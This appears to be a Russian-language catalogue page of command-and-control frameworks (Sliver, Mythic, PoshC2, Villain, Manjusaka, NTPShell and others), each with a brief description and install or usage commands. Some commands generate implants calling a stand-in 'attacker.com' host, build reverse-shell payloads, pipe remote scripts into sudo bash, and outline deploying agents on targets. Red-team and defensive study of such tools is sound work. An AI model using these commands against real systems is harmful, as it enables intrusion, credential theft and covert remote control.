Каталог инструментов

27 инструментов

Тег: c2 ×

LazyOwn

vrelease/0.2.151
Post-Exploitation

Комплексный red-team фреймворк с C2 на базе AI, полиморфными имплантами и встроенными инструментами пост-эксплуатации.

git clone https://github.com/grisuno/LazyOwn.git && cd LazyOwn bash install.sh

Manjusaka

Post-Exploitation

C2-фреймворк на Rust (агент) и Go (сервер) с веб-панелью управления: сбор системной информации, скриншоты, кейлоггинг, работа с файлами, выполнение команд, извлечение сохранённых паролей браузеров. Получил известность в 2022 …

# Требования: Rust 1.85+, Cargo, Protocol Buffers compiler, OpenSSL dev headers git clone https://git.toolsofthetrade.qzz.io/recovered/manjusaka.git cd manjusaka cargo build --workspace --release # Запуск сервера управления (nps) ./target/release/nps # Веб-панель: https://localhost:33000/manjusaka/static # Дальше в панели: добавить листенер (внешний IP) -> создать проект (callback = внешний IP, # слушатель — только что созданный) -> сгенерировать агент npc1 -> запустить на цели -> # после коннекта агент подгружает расширенный npc2 и открывает обратное соединение.

Merlin

v2.1.4
Exploitation

Кроссплатформенный C2-сервер и агент на Go с транспортом по HTTP/2 для постэксплуатационных сценариев в рамках авторизованного пентеста.

wget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Linux-x64.7z 7z x merlinServer-Linux-x64.7z sudo ./merlinServer-Linux-x64 ./data/bin/merlinCLI-Linux-x64

Mythic

v3.4.0.5
Exploitation

Кросс-платформенная, управляемая через плагины платформа для эмуляции противника (adversary emulation) с веб-интерфейсом, используется командами авторизованного red-teaming.

sudo make sudo ./mythic-cli start sudo ./mythic-cli install github https://github.com/MythicAgents/apfell sudo ./mythic-cli install github https://github.com/MythicC2Profiles/http

Mythic

v3.4.0.5
Post-Exploitation

Модульный C2-фреймворк с веб-интерфейсом, поддерживающий множество агентов (Apollo, Poseidon, Medusa и др.) через Docker-контейнеры. Поддерживает Windows, Linux, macOS. Каждый агент — отдельный плагин, легко расширяется.

# Требуется Docker и Docker Compose: git clone https://github.com/its-a-feature/Mythic cd Mythic sudo ./install_docker_ubuntu.sh sudo make # Установка агента: sudo ./mythic-cli install github https://github.com/MythicAgents/Apollo # Запуск: sudo ./mythic-cli start # Веб-интерфейс: https://localhost:7443

NTPShell

Post-Exploitation

Скрытый C2-канал, передающий команды и данные внутри NTP-пакетов — трафик выглядит как обычная синхронизация времени и слабо детектируется сетевым мониторингом. Написан на C, сервер и клиент в одном …

git clone https://git.toolsofthetrade.qzz.io/recovered/ntpshell.git cd ntpshell gcc ntp.c -lpthread -o ntp # C2-сервер: ./ntp -S # C2-клиент (управляемая машина): ./ntp -C -s <server_addr>

NimPlant

v1.4
Exploitation

Лёгкий first-stage C2-имплант, написанный на Nim и Rust, с Python-сервером и веб-интерфейсом для ранних этапов red team операций.

# Clone the repository git clone https://github.com/chvancooten/NimPlant.git cd NimPlant # Install Python dependencies for the server pip install -r server/requirements.txt # Install Nim (required for compiling implants) # On Linux/macOS: curl https://nim-lang.org/choosenim/init.sh -sSf | sh # On Windows, download and run the Nim installer from nim-lang.org # Install Nim dependencies nimble install -y winim nimcrypto zippy # Edit configuration before compiling nano config.toml # Compile the implant (Windows EXE) python3 NimPlant.py compile -o exe # Compile as DLL python3 NimPlant.py compile -o dll # Compile as shellcode (via sRDI) python3 NimPlant.py compile -o shellcode # Cross-compile for Windows from Linux python3 NimPlant.py compile -o exe --crosscompile # Docker server setup docker run --rm -it -p 80:80 -p 443:443 -p 127.0.0.1:31337:31337 -v ${PWD}:/nimplant -e "TZ=Europe/Amsterdam" chvancooten/nimplant:latest server # Building the frontend (if modifications are needed) cd ui npm install python3 build-ui.py

PoshC2

v9.0
Exploitation

Proxy-aware C2 фреймворк для авторизованного red team: постэксплуатация и латеральное перемещение. Модульная архитектура на PowerShell/C#/Python с готовыми имплантами.

curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install.sh | sudo bash sudo ./Install.sh curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install.sh | sudo bash -s -- -p /root/PoshC2 curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/dev/Install.sh | sudo bash -s -- -b dev curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install-for-Docker.sh | sudo bash curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/BRANCHNAME/Install-for-Docker.sh | sudo bash -s -- -b BRANCHNAME

Sliver

v1.7.3
Exploitation

Современный open source C2-фреймворк от BishopFox. Альтернатива Cobalt Strike и Metasploit для red team операций. Поддерживает несколько транспортных протоколов и генерацию имплантов. Возможности: - Импланты под Windows, Linux, …

# Скачать бинарь сервера: # https://github.com/BishopFox/sliver/releases # Linux (быстрый старт): curl https://sliver.sh/install | sudo bash # Запустить сервер: sudo sliver-server # В консоли Sliver: # Создать имплант (beacon): generate beacon --mtls attacker.com --os windows --arch amd64 # Запустить listener: mtls # Ждать подключения: beacons use <beacon-id> ls / whoami / shell

Tsukuyomi

v0.4.2
Exploitation

C2-фреймворк на Rust для Linux x86_64 и Windows x86_64. Реализует staged-доставку: стейджер (Mikazuki) выходит на связь по HTTPS, замещает себя в памяти полным имплантом (Mangetsu), который берёт на …

# Требования: Rust 1.70+, Linux x86_64 git clone https://codeberg.org/lorsupra/Tsukuyomi.git cd Tsukuyomi cargo build --release # Запуск (однобинарный лаунчер: поднимает сервер + консоль) ./target/release/tsukuyomi # В консольном REPL: # build stager -- компилирует стейджер (Linux + Windows), запрашивает URL C2 # build implant -- компилирует имплант (Linux + Windows) # build all -- стейджер + имплант # sessions -- список активных сессий # interact 1 -- подключиться к сессии #1 # shell id=1 whoami -- выполнить команду на цели # Схема: стейджер → HTTPS → сервер → замена в памяти → имплант # Имплант остаётся только в RAM; TLS-пиннинг бакается при сборке

Villain

vV2.2.1
Post-Exploitation

Многосессионный C2-фреймворк для Windows и Linux reverse shell-ов. Генерирует обфусцированные payload-ы для PowerShell, Bash и других шеллов, управляет несколькими сессиями одновременно, поддерживает peer-to-peer связь между teamserver-ами. Лёгкий и …

git clone https://github.com/t3l3machus/Villain cd Villain pip3 install -r requirements.txt # Запуск сервера: sudo python3 Villain.py # Генерация payload (внутри Villain): # villain > generate os=windows lhost=192.168.1.100 obfuscate # villain > generate os=linux lhost=192.168.1.100 # Подключение teamservers: # villain > connect 192.168.1.200 65001

autovnet

v0.13.0
Exploitation

Инструмент для симуляции IP-сетей интернет-масштаба, поддерживает сценарии adversary emulation с отдельной command-and-control инфраструктурой.

git clone https://gitlab.com/autovtools/autovrtfm/autovnet.git cd autovnet pip install -e .